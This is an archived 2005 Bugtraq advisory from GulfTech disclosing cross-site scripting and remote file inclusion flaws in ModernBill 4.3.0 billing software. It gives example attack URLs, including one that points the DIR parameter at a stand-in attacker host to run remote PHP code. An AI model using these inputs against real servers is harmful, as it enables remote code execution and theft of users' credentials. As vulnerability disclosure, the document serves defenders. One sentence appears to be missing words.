lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1113139807_12@S4.cableone.net>
Date: Sun, 10 Apr 2005 08:18:15 -0500
From: "GulfTech Security Research" <security@...ftech.org>
To: <bugtraq@...urityfocus.com>, "OSVDB" <moderators@...db.org>,
	"Secunia Research" <vuln@...unia.com>
Subject: Multiple ModernBill 4.3.0 And Earlier Vulnerabilities


##########################################################
# GulfTech Security Research		 April 10th, 2005
##########################################################
# Vendor  : ModernGigabyte, LLC
# URL     : http://www.modernbill.com/
# Version : ModernBill 4.3.0 && Earlier
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
ModernBill is a widely used billing and management software used
by webhosts to manage billing and financial data. ModernBill is
prone to remote file inclusion and cross site scripting in version 
prior to 4.3.1. These vulnerabilities could allow for an attacker to 
execute client side code in the context of the victims web browser, 
steal sensitive user data, and run system commands remotely on the 
affected web server. A fixed version is available and users are advised 
to upgrade immediately.



Cross Site Scripting:
The ModernBill order forms are prone to multiple cross site scripting 
issues. Below are a few examples of this particular issue.

http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]
http://example.com/order/orderwiz.php?v=1&aid=[XSS]

This vulnerability could be used to steal cookie based authentication 
credentials within the scope of the current domain, or render hostile 
code in a victim's browser.



Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the
root ModernBill directory. This directory contains several files to
help users learn how to customize ModernBill to specifically fit their 
needs. One of the scripts included in this directory is vulnerable to
a very dangerous remote file include vulnerability. Lets have a look at
the file "news.php"


// ~~~~~~~~~~~~~~~~~
// DO NOT EDIT START
// ~~~~~~~~~~~~~~~~~
include_once($DIR."include/functions.inc.php");


If globals are set to on, and no include restrictions are in effect then 
we can include any php code of our choice remotely. Of course the 

hosting the malicious file to be included could not have php enabled, or 
the file would be parsed before it reached the victim server. 

http://example.com/samples/news.php?DIR=http://attacker/

This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.



Solution:
A fix for the mentioned issues has been available for quite some time now
and users should upgrade their ModernBill installations.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00067-04102005



Credits:
James Bercegay of the GulfTech Security Research Team

-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.308 / Virus Database: 266.9.5 - Release Date: 4/7/2005
 



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ